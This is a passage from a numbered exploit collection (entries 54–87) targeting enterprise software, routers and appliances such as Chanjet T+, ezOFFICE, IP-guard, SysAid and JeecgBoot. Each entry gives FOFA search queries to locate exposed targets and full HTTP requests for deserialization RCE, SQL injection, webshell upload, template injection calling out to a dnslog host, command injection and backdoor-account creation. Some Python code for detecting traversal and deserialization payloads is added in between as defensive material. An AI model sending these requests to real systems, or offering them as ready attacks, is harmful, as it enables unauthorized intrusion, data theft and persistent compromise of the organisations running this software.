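    """Undo repeated percent-encoding ('..%2F', '%252e%252e') so the traversal
    check sees the same string the filesystem eventually will."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_join(base_dir: str, user_path: str) -> str:
    """Join user_path under base_dir and prove lexically that it stays inside.
    Both separators are normalised first; posixpath.normpath collapses '..'
    without touching the disk, so this also works for paths that do not exist
    and for a base directory on another host."""
    relative = fully_decode(user_path).replace("\\", "/").lstrip("/")
    base = posixpath.normpath(base_dir)
    prefix = base if base.endswith("/") else base + "/"
    target = posixpath.normpath(posixpath.join(base, relative))
    if target != base and not target.startswith(prefix):
        raise ValueError(f"path escapes {base_dir}: {user_path!r}")
    return target


if __name__ == "__main__":
    # Constructed inputs: the names the PoCs above send, plus ordinary ones.
    for name in ["report.pdf", "2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt",
                 "./webapps/nc_web/1.jsp", "\\webapps\\nc_web\\x.jsp", "s.php "]:
        try:
            print("upload ok  ", safe_upload_name(name))
        except ValueError as e:
            print("upload deny", e)
    for path in ["reports/2024/q1.pdf", "../../../etc/passwd",
                 "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"]:
        try:
            print("read ok    ", safe_join("/srv/files", path))
        except ValueError as e:
            print("read deny  ", e)
```

The containment test is deliberately string-based rather than os.path.realpath-based: realpath follows symlinks on the local disk, which is the right second check on the server itself but is not available to a reverse proxy or a WAF that only sees the request.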
54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

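Entries 22, 23, 25, 54 and 56 share one root cause even though they target a Java platform and a .NET one: the request body names the class the server should instantiate (fastjson's "@type", AjaxPro's "__type") or names a remote JNDI resource (log4j's "${jndi:...}", registerServlet's "dsname=ldap://..."), and the server obliges. The two AjaxPro payloads are the standard ObjectDataProvider chain, which is why the same JSON works against two different handlers. The code below is an added example written for this page, not code from the original post or from any vendor: it walks a JSON body to any depth and reports type-selector keys, known gadget class names and JNDI URLs, resolves the ${lower:j}/${::-n} lookups log4j would resolve, and treats a body that strict JSON rejects as a finding in itself, because fastjson's lenient parser accepts entry 23's payload while json.loads does not. The request bodies are constructed after the PoCs with placeholder hostnames; the gadget list is an assumption and is not exhaustive.

```python
import json
import re
from urllib.parse import unquote_plus

# Constructed request bodies shaped after entries 22, 23, 25, 54 and 56 above;
# hostnames are placeholders. FASTJSON_BODY is deliberately not valid JSON: the
# page's payload is written that way, fastjson's lenient parser accepts it and a
# strict parser rejects it, which is why a parse failure is itself a finding.
LOG4J_BODY = '{"loginName":"${jndi:ldap://dnslog.example/a}"}'
OBFUSCATED_BODY = '{"loginName":"${${lower:j}${::-n}di:${lower:l}dap://dnslog.example/a}"}'
FASTJSON_BODY = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                 '{"@type":"java.net.URL","val":"http://dnslog.example"}}""}')
AJAXPRO_BODY = json.dumps({"storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, "
              "Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
        "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, "
                  "Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, "
                      "Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName": "cmd", "Arguments": "/c ping dnslog.example"}}}})
BENIGN_BODY = '{"loginName":"admin","storeID":"S001"}'
REGISTER_FORM = "type=1&dsname=ldap://dnslog.example"

# Keys that let the client pick the class to instantiate: fastjson, AjaxPro and
# Json.NET respectively. A string value on one of these, at any depth, is reported.
TYPE_KEYS = {"@type", "__type", "$type"}
# Assumed, non-exhaustive list of class names that only appear in gadget chains.
GADGET_TYPES = re.compile(
    r"System\.Windows\.Data\.ObjectDataProvider|System\.Diagnostics\.Process|"
    r"System\.Windows\.Markup\.XamlReader|com\.alibaba\.fastjson\.|java\.net\.URL|"
    r"com\.sun\.rowset\.JdbcRowSetImpl|javax\.naming\.", re.I)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)
REMOTE_JNDI_URL = re.compile(r"\b(?:ldaps?|rmi|iiop|corbaname|dns)://", re.I)
# log4j lookups nest: ${lower:J} -> j, ${anything:-j} -> j. Resolve those first.
LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")


def deobfuscate(text: str, rounds: int = 10) -> str:
    """Resolve nested case/default lookups the way log4j would, innermost first."""
    for _ in range(rounds):
        new = LOOKUP_CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        new = LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def walk(obj):
    """Yield every (key, value) pair at any depth of a decoded JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield key, value
            yield from walk(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from walk(value)


def inspect_json_body(body: str):
    """Sorted, de-duplicated (kind, detail) findings for one JSON request body."""
    found = set()
    text = deobfuscate(body)
    jndi = JNDI_RE.search(text)
    if jndi:
        found.add(("jndi-lookup", text[jndi.start():jndi.start() + 40]))
    for m in GADGET_TYPES.finditer(text):
        found.add(("gadget-class", m.group(0)))
    try:
        doc = json.loads(body)
    except ValueError:
        found.add(("unparseable-json", "lenient parsers such as fastjson may still accept this"))
        doc = None
    for key, value in walk(doc):
        if key in TYPE_KEYS and isinstance(value, str):
            found.add(("type-marker", f"{key}={value}"))
        if isinstance(value, str) and REMOTE_JNDI_URL.search(deobfuscate(value)):
            found.add(("remote-jndi-url", f"{key}={value}"))
    return sorted(found)


def inspect_form_body(body: str):
    """Same checks for x-www-form-urlencoded bodies (entry 25's dsname=ldap://...)."""
    found = set()
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        value = unquote_plus(value)
        if REMOTE_JNDI_URL.search(deobfuscate(value)):
            found.add(("remote-jndi-url", f"{key}={value}"))
        if JNDI_RE.search(deobfuscate(value)):
            found.add(("jndi-lookup", f"{key}={value}"))
    return sorted(found)


if __name__ == "__main__":
    for label, body in [("log4j", LOG4J_BODY), ("obfuscated", OBFUSCATED_BODY),
                        ("fastjson", FASTJSON_BODY), ("ajaxpro", AJAXPRO_BODY),
                        ("benign", BENIGN_BODY)]:
        print(label, inspect_json_body(body) or "clean")
    print("registerServlet", inspect_form_body(REGISTER_FORM))
```

A "type-marker" finding on an endpoint whose contract is a plain integer or string (storeID, loginName) is enough on its own to block the request; the gadget-class list only adds attribution. The fix on the server side is the same in both ecosystems: disable polymorphic type handling (fastjson autotype, AjaxPro/Json.NET TypeNameHandling) or bind it to an explicit allow-list of expected classes.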
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then visit:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If response lines 42 and 43 contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the path it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA (Seeyon OA) getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
Exploit request below (it drops a Godzilla webshell):
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
